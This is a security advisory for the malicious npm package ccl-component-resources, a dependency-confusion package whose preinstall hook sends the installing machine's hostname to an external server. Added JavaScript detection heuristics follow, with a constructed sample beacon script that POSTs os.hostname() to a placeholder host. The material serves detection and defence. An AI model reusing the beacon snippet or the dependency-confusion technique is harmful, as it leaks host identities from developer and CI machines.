MAL-2024-1959
Malicious code in ccl-component-resources (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a3aab5a60bbc55422ada7e8937985342cfee30ddac8e35dab2c0d03eb3d12d23)

ccl-component-resources@99.0.0 is a dependency-confusion package: the name targets a likely-internal package, the semver is set to 99.0.0 to win resolution against private registries, and index.js is an empty stub (`module.exports = {}`). package.json declares a `preinstall` lifecycle hook that runs `node pingback.js`. pingback.js reads `os.hostname()` and POSTs a JSON payload (`{hn,...package name, timestamp}`) to https://c.adityasec.com/hJWEvPPiaUrSeF-9_F8XSw on every `npm install`. Any installer whose private dependency resolution mistakenly pulls this public package will leak the host identifier of the affected dev or CI machine to an external server. The package self-describes as an 'authorized PoC,' but the beacon fires unconditionally for every installer regardless of authorization, and the destination is attacker-controlled from the installer's perspective.
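The indicators described above (an install-time lifecycle hook, an inflated major version, a public name colliding with a private package, and a script that reads the hostname and makes an outbound request) can be checked mechanically before a package is admitted to a registry mirror or a lockfile. The JavaScript below is an added example written for this page; it is not code from the advisory, from Amazon Inspector, or from the package. The manifest and script it scans are constructed stand-ins that mirror the description above (with a placeholder beacon URL), and the `maxPlausibleMajor` threshold and the `internalNames` list are assumptions a team would set for its own environment.

```javascript
// Added example: manifest and install-script heuristics for dependency-confusion
// style packages. Not the advisory's own code; sample inputs are constructed.

// npm lifecycle scripts that run during `npm install` without user interaction.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'preprepare', 'postprepare'];

// Inspect a parsed package.json and return a list of findings.
// opts.internalNames: names of private packages this org publishes (assumption).
// opts.maxPlausibleMajor: major version above which we treat semver as inflated (assumption).
function auditPackageManifest(manifest, opts = {}) {
  const maxMajor = opts.maxPlausibleMajor ?? 50;
  const internalNames = new Set(opts.internalNames || []);
  const findings = [];

  // A public package whose name matches a private one is the core dependency-confusion signal.
  if (internalNames.has(manifest.name)) {
    findings.push({ rule: 'internal-name-collision', detail: `public package named ${manifest.name}` });
  }

  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === 'string' && scripts[hook].trim() !== '') {
      findings.push({ rule: 'lifecycle-hook', detail: `${hook}: ${scripts[hook]}` });
    }
  }

  // Inflated versions (e.g. 99.0.0) are chosen to out-resolve any real private release.
  const major = parseInt(String(manifest.version || '').split('.')[0], 10);
  if (Number.isInteger(major) && major >= maxMajor) {
    findings.push({ rule: 'inflated-semver', detail: `major version ${major} >= ${maxMajor}` });
  }

  // An install-time script in a package that depends on nothing has little legitimate reason to exist.
  const depCount = Object.keys(manifest.dependencies || {}).length;
  if (depCount === 0 && findings.some((f) => f.rule === 'lifecycle-hook')) {
    findings.push({ rule: 'hook-without-deps', detail: 'install-time script in a package with no dependencies' });
  }
  return findings;
}

// Scan the source of a script referenced by a lifecycle hook for a beacon pattern:
// host identity collection combined with an outbound HTTP call.
function scanInstallScript(source) {
  const hits = [];
  const collectsHost = /\bos\.(hostname|userInfo|networkInterfaces)\s*\(/.test(source);
  const outbound = /\b(https?\.request|https?\.get|fetch)\s*\(/.test(source);
  if (collectsHost) hits.push('collects-host-identity');
  if (outbound) hits.push('outbound-http');
  if (collectsHost && outbound) hits.push('beacon-pattern');
  return hits;
}

// Constructed sample manifest modelled on the advisory (not the real package.json).
const SAMPLE_MANIFEST = {
  name: 'ccl-component-resources',
  version: '99.0.0',
  main: 'index.js',
  scripts: { preinstall: 'node pingback.js' },
};

// Constructed sample install script with a placeholder URL (not the real pingback.js).
const SAMPLE_SCRIPT = `
const os = require('os');
const https = require('https');
const body = JSON.stringify({ hn: os.hostname(), pkg: 'ccl-component-resources', ts: Date.now() });
const req = https.request('https://beacon.example.invalid/PLACEHOLDER', { method: 'POST' });
req.end(body);
`;

// Constructed benign manifest for comparison.
const BENIGN_MANIFEST = { name: 'tiny-util', version: '1.2.3', dependencies: {} };

function runAudit() {
  return {
    manifestFindings: auditPackageManifest(SAMPLE_MANIFEST, { internalNames: ['ccl-component-resources'] }),
    scriptHits: scanInstallScript(SAMPLE_SCRIPT),
    benignFindings: auditPackageManifest(BENIGN_MANIFEST, { internalNames: ['ccl-component-resources'] }),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runAudit(), null, 2));
}
```

The heuristics only flag candidates for review; a lifecycle hook is not malicious by itself. The structural fix for the confusion vector is to stop public resolution of private names altogether: publish internal packages under an organisation scope and bind that scope to the private registry in `.npmrc` (`@yourorg:registry=https://<private-registry>/`), so a public package with a colliding unscoped name is never a resolution candidate.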
Affected packages
No fixed version published yet for ccl-component-resources (npm). Pin to a known-safe version or switch to an alternative.